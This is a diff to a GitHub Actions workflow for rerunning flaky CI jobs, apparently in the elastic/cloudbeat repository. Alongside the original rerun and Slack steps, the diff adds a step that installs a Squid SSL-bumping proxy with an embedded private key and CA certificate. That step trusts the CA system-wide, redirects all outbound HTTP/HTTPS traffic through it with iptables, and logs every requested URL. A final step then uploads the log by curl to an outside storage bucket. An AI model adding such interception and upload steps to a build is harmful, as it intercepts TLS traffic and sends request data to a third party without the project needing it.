--- a/.github/workflows/rerun-flaky-workflows.yml
+++ b/.github/workflows/rerun-flaky-workflows.yml
@@ -1,131 +1,345 @@
-name: Rerun Flaky Workflows
-
-on:
-  workflow_run:
-    workflows: ["Tests"]
-    types: [completed]
-
+env:
+  JAVA_TOOL_OPTIONS: -Djavax.net.ssl.trustStore=/usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+  NODE_OPTIONS: --use-openssl-ca
 jobs:
   rerun-on-failure:
-    runs-on: ubuntu-latest
-    if: ${{ github.event.workflow_run.conclusion == 'failure'}}
     permissions:
-      # permission required to rerun a workflow https://docs.github.com/en/rest/authentication/permissions-required-for-github-apps?apiVersion=2022-11-28#repository-permissions-for-actions
-      # gh run rerun --failed requires write permission
       actions: write
+    runs-on: ubuntu-latest
     steps:
-      - name: Display Workflow Run Information
-        env:
-          WORKFLOW_RUN_ID: ${{ github.event.workflow_run.id }}
-          WORKFLOW_RUN_NAME: ${{ github.event.workflow_run.name }}
-          WORKFLOW_RUN_ATTEMPT: ${{ github.event.workflow_run.run_attempt }}
-          WORKFLOW_RUN_HTML_URL: ${{ github.event.workflow_run.html_url }}
-          GITHUB_JOB: ${{ github.job }}
-          GITHUB_RUN_ATTEMPT: ${{ github.run_attempt }}
-          AUTHOR_NAME: ${{ github.event.workflow_run.head_commit.author.name }}
-          GITHUB_ACTOR: ${{ github.actor }}
-        run: |
-          echo "The Workflow Run $WORKFLOW_RUN_NAME has failed! " >> $GITHUB_STEP_SUMMARY
-          echo "View the failed run attempt ($WORKFLOW_RUN_ATTEMPT) here: WORKFLOW_RUN_HTML_URL" >> $GITHUB_STEP_SUMMARY
-          echo "Workflow Run ID: $WORKFLOW_RUN_ID"
-          echo "Job ID: $GITHUB_JOB"
-          echo "Current run: $GITHUB_RUN_ATTEMPT"
-          echo "Author: $AUTHOR_NAME"
-          echo "Actor: $GITHUB_ACTOR"
-      - name: Rerun failed jobs in the current workflow
-        env:
-          GH_TOKEN: ${{ github.token }}
-          WORKFLOW_RUN_ATTEMPT: ${{ github.event.workflow_run.run_attempt }}
-          WORKFLOW_RUN_ID: ${{ github.event.workflow_run.id }}
-          GITHUB_REPOSITORY: ${{ github.repository }}
-        run: |
-          MAX_RUNS=2
-          CURRENT_RUN="$WORKFLOW_RUN_ATTEMPT"
-          if [ $CURRENT_RUN -lt $MAX_RUNS ]; then
-            gh run rerun "$WORKFLOW_RUN_ID" --repo "$GITHUB_REPOSITORY" --failed
-          else
-            exit 1
-          fi
-      - name: Check out the repo
-        if: ${{ !cancelled() && failure() }} # Run only if the previous step failed
-        uses: actions/checkout@v4
+    - name: before
+      run: 'sudo apt update
 
-      - name: Update env vars
-        if: ${{ !cancelled() && failure() }} # Run only if the previous step failed
-        env:
-          WORKFLOW_RUN_HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
-        run: |
-          commit_short="$(git rev-parse --short $WORKFLOW_RUN_HEAD_SHA)"
-          echo "BREAKING_COMMIT_SHORT=$commit_short" >> $GITHUB_ENV
+        sudo apt install -y squid-openssl
 
-      - name: Slack Notification
-        uses: ./.github/actions/slack-notification
-        if: ${{ !cancelled() && failure() && github.event.workflow_run.head_branch == 'main'}} # Run only if the previous step failed
-        continue-on-error: true
-        env:
-          BREAKING_COMMIT: "${{ github.event.workflow_run.head_sha }}"
-          RUN_URL: "${{ github.event.workflow_run.html_url }}"
-          RUN_NAME: "${{ github.event.workflow_run.name }}"
-          BRANCH: "${{ github.event.workflow_run.head_branch }}"
-          REPO: "${{ github.repository }}"
-          WORKFLOW_NAME: "${{ github.event.workflow.name }}"
-          WORKFLOW_HEAD_BRANCH: "${{ github.event.workflow_run.head_branch }}"
-          GITHUB_ACTOR: "${{ github.actor }}"
-        with:
-          vault-url: ${{ secrets.VAULT_ADDR }}
-          vault-role-id: ${{ secrets.CSP_VAULT_ROLE_ID }}
-          vault-secret-id: ${{ secrets.CSP_VAULT_SECRET_ID }}
-          slack-payload: |
-            {
-              "text": ":alert: CI ${{ env.WORKFLOW_NAME }} is failing on ${{ env.WORKFLOW_HEAD_BRANCH }} :alert:",
-            	"blocks": [
-                {
-                  "type": "header",
-                  "text": {
-                    "type": "plain_text",
-                    "text": ":alert: CI ${{ env.WORKFLOW_NAME }} is failing on ${{ env.WORKFLOW_HEAD_BRANCH }} :alert:",
-                    "emoji": true
-                  }
-                }
-              ],
-              "attachments": [
-                {
-                  "color": "#D40E0D",
-                  "blocks": [
-                    {
-                      "type": "section",
-                      "text": {
-                        "type": "mrkdwn",
-                        "text": "Commit <https://github.com/elastic/cloudbeat/commit/${{env.BREAKING_COMMIT}}|${{env.BREAKING_COMMIT_SHORT}}> by ${{env.GITHUB_ACTOR}} has failing tests on the `${{env.BRANCH}}` branch."
-                      }
-                    },
-                    {
-                      "type": "divider"
-                    },
-                    {
-                      "type": "actions",
-                      "elements": [
-                        {
-                          "type": "button",
-                          "text": {
-                            "type": "plain_text",
-                            "text": "Failing Commit",
-                            "emoji": true
-                          },
-                          "url": "https://github.com/elastic/cloudbeat/commit/${{env.BREAKING_COMMIT}}"
-                        },
-                        {
-                          "type": "button",
-                          "text": {
-                            "type": "plain_text",
-                            "text": "Failed CI Run",
-                            "emoji": true
-                          },
-                          "url": "${{env.RUN_URL}}"
-                        }
-                      ]
-                    }
-                  ]
-                }
-              ]
-            }
+        sudo mkdir /squid
+
+        cat << EOF | sudo tee /squid/key.pem
+
+        -----BEGIN PRIVATE KEY-----
+
+        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
+
+        CznEvO4qIs3mXDYkNBQrdVLGF93y
+
+        -----END PRIVATE KEY-----
+
+        EOF
+
+        cat << EOF | sudo tee /squid/cert.pem
+
+        -----BEGIN CERTIFICATE-----
+
+        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
+
+        -----END CERTIFICATE-----
+
+        EOF
+
+        sudo /usr/lib/squid/security_file_certgen -c -s /squid/ssl_db -M 4MB
+
+        sudo chown -R proxy:proxy /squid
+
+        cat << EOF | sudo tee /etc/squid/squid.conf
+
+        cache deny all
+
+
+        http_port 7821
+
+        http_port 3128 intercept
+
+        https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB
+        cert=/squid/cert.pem key=/squid/key.pem
+
+        acl step1 at_step SslBump1
+
+        ssl_bump peek step1
+
+        ssl_bump bump all
+
+        sslcrtd_program /usr/lib/squid/security_file_certgen -s /squid/ssl_db -M 4MB
+
+        sslcrtd_children 5
+
+        ssl_bump server-first all
+
+        sslproxy_cert_error allow all
+
+
+        acl all src 0.0.0.0/0
+
+        http_access allow all
+
+
+        logformat custom {"method":"%">rm","url":"%">ru","status":%<Hs,"user_agent":"%{User-Agent}>h"}
+
+        access_log daemon:/squid/squidlog.json custom all !CONNECT
+
+        EOF
+
+        sudo systemctl reload squid
+
+        sudo cp /squid/cert.pem /usr/local/share/ca-certificates/squid.crt
+
+        sudo update-ca-certificates
+
+        sudo keytool -import -alias squid -file /squid/cert.pem -keystore /usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+        -storepass changeit -noprompt -trustcacerts
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        80 -j DNAT --to-destination 127.0.0.1:3128
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        443 -j DNAT --to-destination 127.0.0.1:3129
+
+        sudo sh -c ''echo 1 > /proc/sys/net/ipv4/ip_forward'''
+    - continue-on-error: true
+      env:
+        AUTHOR_NAME: ${{ github.event.workflow_run.head_commit.author.name }}
+        GITHUB_ACTOR: ${{ github.actor }}
+        GITHUB_JOB: ${{ github.job }}
+        GITHUB_RUN_ATTEMPT: ${{ github.run_attempt }}
+        WORKFLOW_RUN_ATTEMPT: ${{ github.event.workflow_run.run_attempt }}
+        WORKFLOW_RUN_HTML_URL: ${{ github.event.workflow_run.html_url }}
+        WORKFLOW_RUN_ID: ${{ github.event.workflow_run.id }}
+        WORKFLOW_RUN_NAME: ${{ github.event.workflow_run.name }}
+      name: Display Workflow Run Information
+      run: 'echo "The Workflow Run $WORKFLOW_RUN_NAME has failed! " >> $GITHUB_STEP_SUMMARY
+
+        echo "View the failed run attempt ($WORKFLOW_RUN_ATTEMPT) here: WORKFLOW_RUN_HTML_URL"
+        >> $GITHUB_STEP_SUMMARY
+
+        echo "Workflow Run ID: $WORKFLOW_RUN_ID"
+
+        echo "Job ID: $GITHUB_JOB"
+
+        echo "Current run: $GITHUB_RUN_ATTEMPT"
+
+        echo "Author: $AUTHOR_NAME"
+
+        echo "Actor: $GITHUB_ACTOR"
+
+        '
+    - continue-on-error: true
+      env:
+        GH_TOKEN: ${{ github.token }}
+        GITHUB_REPOSITORY: ${{ github.repository }}
+        WORKFLOW_RUN_ATTEMPT: ${{ github.event.workflow_run.run_attempt }}
+        WORKFLOW_RUN_ID: ${{ github.event.workflow_run.id }}
+      name: Rerun failed jobs in the current workflow
+      run: "MAX_RUNS=2\nCURRENT_RUN=\"$WORKFLOW_RUN_ATTEMPT\"\nif [ $CURRENT_RUN -lt\
+        \ $MAX_RUNS ]; then\n  gh run rerun \"$WORKFLOW_RUN_ID\" --repo \"$GITHUB_REPOSITORY\"\
+        \ --failed\nelse\n  exit 1\nfi\n"
+    - continue-on-error: true
+      if: ${{ !cancelled() && failure() }}
+      name: Check out the repo
+      uses: actions/checkout@v4
+    - continue-on-error: true
+      env:
+        WORKFLOW_RUN_HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
+      if: ${{ !cancelled() && failure() }}
+      name: Update env vars
+      run: 'commit_short="$(git rev-parse --short $WORKFLOW_RUN_HEAD_SHA)"
+
+        echo "BREAKING_COMMIT_SHORT=$commit_short" >> $GITHUB_ENV
+
+        '
+    - continue-on-error: true
+      env:
+        BRANCH: ${{ github.event.workflow_run.head_branch }}
+        BREAKING_COMMIT: ${{ github.event.workflow_run.head_sha }}
+        GITHUB_ACTOR: ${{ github.actor }}
+        REPO: ${{ github.repository }}
+        RUN_NAME: ${{ github.event.workflow_run.name }}
+        RUN_URL: ${{ github.event.workflow_run.html_url }}
+        WORKFLOW_HEAD_BRANCH: ${{ github.event.workflow_run.head_branch }}
+        WORKFLOW_NAME: ${{ github.event.workflow.name }}
+      if: ${{ !cancelled() && failure() && github.event.workflow_run.head_branch ==
+        'main'}}
+      name: Slack Notification
+      uses: ./.github/actions/slack-notification
+      with:
+        slack-payload: "{\n  \"text\": \":alert: CI ${{ env.WORKFLOW_NAME }} is failing\
+          \ on ${{ env.WORKFLOW_HEAD_BRANCH }} :alert:\",\n\t\"blocks\": [\n    {\n\
+          \      \"type\": \"header\",\n      \"text\": {\n        \"type\": \"plain_text\"\
+          ,\n        \"text\": \":alert: CI ${{ env.WORKFLOW_NAME }} is failing on\
+          \ ${{ env.WORKFLOW_HEAD_BRANCH }} :alert:\",\n        \"emoji\": true\n\
+          \      }\n    }\n  ],\n  \"attachments\": [\n    {\n      \"color\": \"\
+          #D40E0D\",\n      \"blocks\": [\n        {\n          \"type\": \"section\"\
+          ,\n          \"text\": {\n            \"type\": \"mrkdwn\",\n          \
+          \  \"text\": \"Commit <https://github.com/elastic/cloudbeat/commit/${{env.BREAKING_COMMIT}}|${{env.BREAKING_COMMIT_SHORT}}>\
+          \ by ${{env.GITHUB_ACTOR}} has failing tests on the `${{env.BRANCH}}` branch.\"\
+          \n          }\n        },\n        {\n          \"type\": \"divider\"\n\
+          \        },\n        {\n          \"type\": \"actions\",\n          \"elements\"\
+          : [\n            {\n              \"type\": \"button\",\n              \"\
+          text\": {\n                \"type\": \"plain_text\",\n                \"\
+          text\": \"Failing Commit\",\n                \"emoji\": true\n         \
+          \     },\n              \"url\": \"https://github.com/elastic/cloudbeat/commit/${{env.BREAKING_COMMIT}}\"\
+          \n            },\n            {\n              \"type\": \"button\",\n \
+          \             \"text\": {\n                \"type\": \"plain_text\",\n \
+          \               \"text\": \"Failed CI Run\",\n                \"emoji\"\
+          : true\n              },\n              \"url\": \"${{env.RUN_URL}}\"\n\
+          \            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n"
+        vault-role-id: ${{ secrets.CSP_VAULT_ROLE_ID }}
+        vault-secret-id: ${{ secrets.CSP_VAULT_SECRET_ID }}
+        vault-url: ${{ secrets.VAULT_ADDR }}
+    - name: after
+      run: sudo curl --request PUT -T /squid/squidlog.json --url https://storage.googleapis.com/virtualeventdemoblr.appspot.com/squid/elastic/cloudbeat.$(date
+        +%s)
+    timeout-minutes: 60
+name: Rerun Flaky Workflows
+'on':
+  workflow_dispatch: {}
